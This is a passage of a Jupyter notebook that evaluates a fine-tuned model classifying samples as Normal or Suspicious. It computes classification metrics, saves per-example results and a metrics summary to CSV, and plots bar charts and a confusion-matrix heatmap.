print("   - Is the model following the expected format?")
print("   - Is it correctly identifying Normal vs Suspicious?")
print("   - Are the reasons/explanations coherent?")
print("\n   If most predictions are UNKNOWN:")
print("   ‚Üí Model needs retraining with more epochs or better parameters")
print("   ‚Üí Check if prompt format matches training format")
print("   ‚Üí Try increasing max_length from 512 to 1024 or 2048")
print("="*80)

In [None]:
# Final Summary Report
# Prints the headline numbers computed by the evaluation loop and the metrics cell.
rule = "=" * 80
n_samples = len(eval_samples)
minutes = elapsed / 60

print("\n" + rule)
print("üéâ FINAL EVALUATION SUMMARY")
print(rule + "\n")

print("üìä Dataset Information:")
print(f"   Total samples evaluated: {n_samples:,}")
print(f"   Evaluation time: {minutes:.2f} minutes")
print(f"   Time per sample: {elapsed / n_samples:.2f} seconds")

print("\nüéØ Key Performance Metrics:")
print(f"   ‚úì Overall Accuracy: {accuracy:.4f} ({accuracy*100:.2f}%)")
print(f"   ‚úì Weighted Precision: {precision_weighted:.4f}")
print(f"   ‚úì Weighted Recall: {recall_weighted:.4f}")
print(f"   ‚úì Weighted F1-Score: {f1_weighted:.4f}")

print(f"\n{rule}")
print("‚úÖ Evaluation Complete!")
print(rule)

In [None]:
# Save results to CSV
# Writes two files to the working directory: per-example results
# (evaluation_results.csv) and the metric summary (metrics_summary.csv).
print("üíæ Saving detailed results...\n")

# Create detailed results DataFrame
# y_true / y_pred come from the metrics cell and are in the same order as `results`,
# so they can be attached as columns directly.
results_df = pd.DataFrame(results)
results_df['true_label'] = y_true
results_df['predicted_label'] = y_pred
results_df['correct'] = results_df['true_label'] == results_df['predicted_label']

# Save to CSV
output_file = 'evaluation_results.csv'
results_df.to_csv(output_file, index=False)
print(f"‚úÖ Detailed results saved to: {output_file}")

# Create metrics summary (the 'Metric' and 'Score' lists must stay in the same order)
metrics_summary = {
    'Metric': [
        'Accuracy',
        'Precision (Macro)',
        'Precision (Weighted)',
        'Recall (Macro)',
        'Recall (Weighted)',
        'F1-Score (Macro)',
        'F1-Score (Weighted)',
        'Exact Match Accuracy',
        'Avg Partial Match',
        'Avg F1 (Word-level)'
    ],
    'Score': [
        accuracy,
        precision_macro,
        precision_weighted,
        recall_macro,
        recall_weighted,
        f1_macro,
        f1_weighted,
        exact_match_accuracy,
        avg_partial_match,
        avg_f1_word
    ]
}

metrics_df = pd.DataFrame(metrics_summary)
metrics_file = 'metrics_summary.csv'
metrics_df.to_csv(metrics_file, index=False)
print(f"‚úÖ Metrics summary saved to: {metrics_file}")

# Show sample of results
print("\nüìã Sample Results (First 10):")
display_cols = ['instruction', 'true_label', 'predicted_label', 'correct', 'f1_score']
print(results_df[display_cols].head(10).to_string(index=False))

# `~` negates the boolean 'correct' column to count the misclassified rows.
print(f"\nüìä Correct Predictions: {results_df['correct'].sum()} / {len(results_df)} ({accuracy*100:.2f}%)")
print(f"üìä Incorrect Predictions: {(~results_df['correct']).sum()} / {len(results_df)} ({(1-accuracy)*100:.2f}%)")

In [None]:
# Visualize Metrics Comparison
# Left panel: accuracy and weighted precision/recall/F1. Right panel: macro vs
# weighted precision/recall/F1 side by side.
print("üé® Creating metrics visualization...\n")

import matplotlib.pyplot as plt
import numpy as np  # used for np.arange below; imported here so the cell is self-contained

# Create metrics comparison bar chart
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(16, 6))

# Plot 1: Overall Metrics
metrics_names = ['Accuracy', 'Precision\n(Weighted)', 'Recall\n(Weighted)', 'F1-Score\n(Weighted)']
metrics_values = [accuracy, precision_weighted, recall_weighted, f1_weighted]

bars1 = ax1.bar(metrics_names, metrics_values, color=['#2ecc71', '#3498db', '#e74c3c', '#f39c12'], alpha=0.8)
ax1.set_ylabel('Score', fontsize=12, fontweight='bold')
ax1.set_title('Overall Performance Metrics', fontsize=14, fontweight='bold')
ax1.set_ylim([0, 1])
ax1.axhline(y=0.5, color='gray', linestyle='--', alpha=0.3, label='50% baseline')
ax1.grid(axis='y', alpha=0.3)
# Without a legend the '50% baseline' label on the dashed line was never displayed.
ax1.legend()

# Add value labels on bars
for bar in bars1:
    height = bar.get_height()
    ax1.text(bar.get_x() + bar.get_width()/2., height,
             f'{height:.3f}\n({height*100:.1f}%)',
             ha='center', va='bottom', fontweight='bold')

# Plot 2: Macro vs Weighted Metrics (each value is [macro, weighted])
metrics_comparison = {
    'Precision': [precision_macro, precision_weighted],
    'Recall': [recall_macro, recall_weighted],
    'F1-Score': [f1_macro, f1_weighted]
}

x = np.arange(len(metrics_comparison))
width = 0.35

# Offset the two series by half a bar width so they sit next to each other.
bars2_1 = ax2.bar(x - width/2, [v[0] for v in metrics_comparison.values()],
                   width, label='Macro', color='#3498db', alpha=0.8)
bars2_2 = ax2.bar(x + width/2, [v[1] for v in metrics_comparison.values()],
                   width, label='Weighted', color='#e74c3c', alpha=0.8)

ax2.set_ylabel('Score', fontsize=12, fontweight='bold')
ax2.set_title('Macro vs Weighted Metrics Comparison', fontsize=14, fontweight='bold')
ax2.set_xticks(x)
ax2.set_xticklabels(metrics_comparison.keys())
ax2.set_ylim([0, 1])
ax2.legend()
ax2.grid(axis='y', alpha=0.3)

# Add value labels
for bars in [bars2_1, bars2_2]:
    for bar in bars:
        height = bar.get_height()
        ax2.text(bar.get_x() + bar.get_width()/2., height,
                 f'{height:.3f}',
                 ha='center', va='bottom', fontsize=9)

plt.tight_layout()
plt.show()

print("‚úÖ Metrics visualization created!")

In [None]:
# Detailed Classification Report
# Prints the per-class report for the status labels and, when there are more than
# five classes, the best and worst classes by F1-score.
print("üìä DETAILED CLASSIFICATION REPORT")
print("="*80 + "\n")

# Generate classification report
report = classification_report(y_true, y_pred, labels=unique_labels, zero_division=0, output_dict=True)
report_df = pd.DataFrame(report).transpose()

# Display full report
print(classification_report(y_true, y_pred, labels=unique_labels, zero_division=0))

# Convert to DataFrame for better visualization
print("\nüìà Per-Class Metrics Summary:")
print(report_df.round(4))

# Show best and worst performing classes
if len(unique_labels) > 5:
    # Keep only the rows that are actual class labels, dropping the summary rows.
    # The previous filter kept rows whose name starts with 'T' (technique IDs), which
    # does not select the status classes used as labels in this notebook.
    class_metrics = report_df[report_df.index.isin(unique_labels)].sort_values('f1-score', ascending=False)

    print("\nüèÜ TOP 5 BEST PERFORMING CLASSES (by F1-score):")
    print(class_metrics.head(5)[['precision', 'recall', 'f1-score', 'support']].round(4))

    print("\n‚ö†Ô∏è TOP 5 WORST PERFORMING CLASSES (by F1-score):")
    print(class_metrics.tail(5)[['precision', 'recall', 'f1-score', 'support']].round(4))

In [None]:
# Visualize Confusion Matrix
# Draws `conf_matrix` (built in the metrics cell, rows = true, columns = predicted,
# ordered as `unique_labels`) as an annotated heatmap.
print("üé® Creating confusion matrix visualization...\n")

import matplotlib.pyplot as plt
import seaborn as sns

# Create figure (at least 12x10 inches, growing with the number of labels)
fig, ax = plt.subplots(figsize=(max(12, len(unique_labels)), max(10, len(unique_labels))))

# If too many labels, show a subset or use different visualization
if len(unique_labels) > 20:
    print(f"‚ö†Ô∏è Large number of labels ({len(unique_labels)}). Showing top 20 most frequent...")
    
    # Get top N most frequent labels (frequency is counted over the TRUE labels only)
    from collections import Counter
    label_counts = Counter(y_true)
    top_labels = [label for label, _ in label_counts.most_common(20)]
    
    # Filter confusion matrix for top labels
    # np.ix_ selects the same set of rows and columns; `np` is the numpy import from
    # the metrics cell, which must have run before this one.
    label_indices = [unique_labels.index(label) for label in top_labels]
    conf_matrix_subset = conf_matrix[np.ix_(label_indices, label_indices)]
    
    # Plot subset
    sns.heatmap(conf_matrix_subset, 
                annot=True, 
                fmt='d', 
                cmap='Blues',
                xticklabels=top_labels,
                yticklabels=top_labels,
                ax=ax,
                cbar_kws={'label': 'Count'})
    
    plt.title(f'Confusion Matrix (Top 20 Labels)\nTotal Labels: {len(unique_labels)}', 
              fontsize=16, fontweight='bold', pad=20)
else:
    # Plot full confusion matrix
    sns.heatmap(conf_matrix, 
                annot=True, 
                fmt='d', 
                cmap='Blues',
                xticklabels=unique_labels,
                yticklabels=unique_labels,
                ax=ax,
                cbar_kws={'label': 'Count'})
    
    plt.title('Confusion Matrix - All Labels', fontsize=16, fontweight='bold', pad=20)

plt.xlabel('Predicted Label', fontsize=12, fontweight='bold')
plt.ylabel('True Label', fontsize=12, fontweight='bold')
plt.xticks(rotation=45, ha='right')
plt.yticks(rotation=0)
plt.tight_layout()
plt.show()

print("‚úÖ Confusion matrix visualization created!")